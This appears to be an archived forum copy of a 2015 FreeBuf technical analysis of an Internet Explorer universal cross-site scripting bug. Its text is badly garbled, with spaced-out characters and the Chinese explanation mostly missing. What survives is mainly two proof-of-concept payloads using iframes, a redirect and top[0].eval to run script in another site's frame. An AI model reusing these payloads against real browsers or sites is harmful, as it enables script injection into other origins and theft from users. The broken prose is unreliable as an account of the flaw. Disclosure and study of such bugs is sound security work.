[8663] 2015-02-05_漏洞追踪:最新IEUXSS漏洞技术分析

文档创建者:s7ckTeam
浏览次数:39
最后更新:2025-01-17
2015-02-05_漏洞追踪:最新IEUXSS漏洞技术分析 I E   U X S S F r e e B u f   2 0 1 5 - 0 2 - 0 5 D a v i d   L e o F u l l   D i s c l o s u r e i e   u x s s   i e F r e e B u f < i f r a m e   s r c = " r e d i r e c t . p h p " > < / i f r a m e > < i f r a m e   s r c = " h t t p s : / / w w w . g o o g l e . c o m / i m a g e s / s r p r / l o g o 1 1 w . p n g " > < / i f r a m e > < s c r i p t >         t o p [ 0 ] . e v a l ( ' _ = t o p [ 1 ] ; a l e r t ( ) ; _ . l o c a t i o n = " j a v a s c r i p t : a l e r t ( d o c u m e n t . d o m a i n ) " ' ) ; < / s c r i p t > p o c     i f r a m e   3 0 2   i f r a m e   C o n t e n t - T y p e   p o c   1   i f r a m e   r e d i r e c t . p h p   2   i f r a m e 3   i f r a m e     e v a l     j s           a .   i f r a m e           b . a l e r t           c .   a l e r t         d .   l o c a t i o n   ,   p a y l o a d 4 p a y l o a d     i f r a m e     a l e r t     j s   线 a l e r t ,   p r o m p t ,   a n d   c o n f i r m   P O C   F i r e F o x   a l e r t f i r e f o x     i f r a m e   , a l e r t   j s   p a y l o a d   C h r o m e a l e r t     p a y l o a d     j s   I E   a l e r t   I E     i f r a m e   p a y l o a d     i f r a m e   p a y l o a d     j s     S O P   i f r a m e   I E  
  p a y l o a d     j s     i f r a m e   & &   p a y l o a d   p a y l o a d < i f r a m e   s r c = " r e d i r e c t . p h p " > < / i f r a m e > < i f r a m e   s r c = " h t t p s : / / w w w . g o o g l e . c o m / i m a g e s / s r p r / l o g o 1 1 w . p n g " > < / i f r a m e > < s c r i p t >         t o p [ 0 ] . e v a l ( ' _ = t o p [ 1 ] ; w i t h ( n e w   X M L H t t p R e q u e s t ) o p e n ( " g e t " , " s l e e p . p h p " , f a l s e ) , s e n d ( ) ; _ . l o c a t i o n = " j a v a s c r i p t : a l e r t ( d o c u m e n t . d o m a i n ) " ' ) ; < / s c r i p t > a l e r t     p a y l o a d     w i n 7 - w i n 8 . 1   i e 1 0 - i e 1 1 r e f S i m p l i f i e d   P o C P o C   w i t h o u t   u s e r   i n t e r a c t i o n [ i n n e r h t . m l F r e e B u f F r e e B u f . C O M ]
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则